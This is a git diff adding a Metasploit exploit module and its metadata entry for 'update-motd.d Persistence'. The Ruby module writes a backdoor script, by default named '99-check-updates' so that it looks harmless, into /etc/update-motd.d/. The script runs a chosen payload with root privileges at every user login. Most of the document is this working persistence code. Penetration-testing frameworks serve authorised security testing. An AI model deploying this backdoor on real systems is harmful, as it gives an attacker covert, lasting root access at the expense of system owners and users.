diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index c18090825948..ed5b2a3b90b1 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -87781,6 +87781,61 @@ ] }, + "exploit_linux/local/motd_persistence": { + "name": "update-motd.d Persistence", + "fullname": "exploit/linux/local/motd_persistence", + "aliases": [ + + ], + "rank": 300, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Julien Voisin" + ], + "description": "This module will add a script in /etc/update-motd.d/ in order to persist a payload.\n The payload will be executed with root privileges everytime a user logs in.", + "references": [ + "URL-https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html" + ], + "platform": "Linux,Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": [ + "Automatic" + ], + "mod_time": "2024-09-11 13:30:09 +0000", + "path": "/modules/exploits/linux/local/motd_persistence.rb", + "is_install_path": true, + "ref_name": "linux/local/motd_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + + ], + "Reliability": [ + "event-dependent" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + + ] + }, "exploit_linux/local/nested_namespace_idmap_limit_priv_esc": { "name": "Linux Nested User Namespace idmap Limit Local Privilege Escalation", "fullname": "exploit/linux/local/nested_namespace_idmap_limit_priv_esc", diff --git a/modules/exploits/linux/local/motd_persistence.rb b/modules/exploits/linux/local/motd_persistence.rb new file mode 100644 index 000000000000..52e076d67abd --- /dev/null +++ b/modules/exploits/linux/local/motd_persistence.rb @@ -0,0 +1,63 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + + include Msf::Post::File + include Msf::Post::Unix + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'update-motd.d Persistence', + 'Description' => %q{ + This module will add a script in /etc/update-motd.d/ in order to persist a payload. + The payload will be executed with root privileges everytime a user logs in. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Julien Voisin' ], + 'Platform' => [ 'unix', 'linux' ], + 'Arch' => ARCH_CMD, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true }, + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '1999-01-01', + 'Notes' => { + 'Stability' => [], + 'Reliability' => [EVENT_DEPENDENT], + 'SideEffects' => [ARTIFACTS_ON_DISK] + }, + 'References' => [ + ['URL', 'https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html'], + ] + ) + ) + register_options([ OptString.new('BACKDOOR_NAME', [true, 'The filename of the backdoor', '99-check-updates']) ]) + end + + def exploit + update_path = '/etc/update-motd.d/' + + unless exists? update_path + fail_with Failure::BadConfig, "#{update_path} doesn't exist" + end + + unless writable? update_path + fail_with Failure::BadConfig, "#{update_path} is not writable" + end + + backdoor_path = File.join(update_path, datastore['BACKDOOR_NAME']) + + if exists? backdoor_path + fail_with Failure::BadConfig, "#{backdoor_path} is already present" + end + + write_file(backdoor_path, "#!/bin/sh\n#{payload.encoded}") + chmod(backdoor_path, 0o755) + print_status "#{backdoor_path} written" + end +end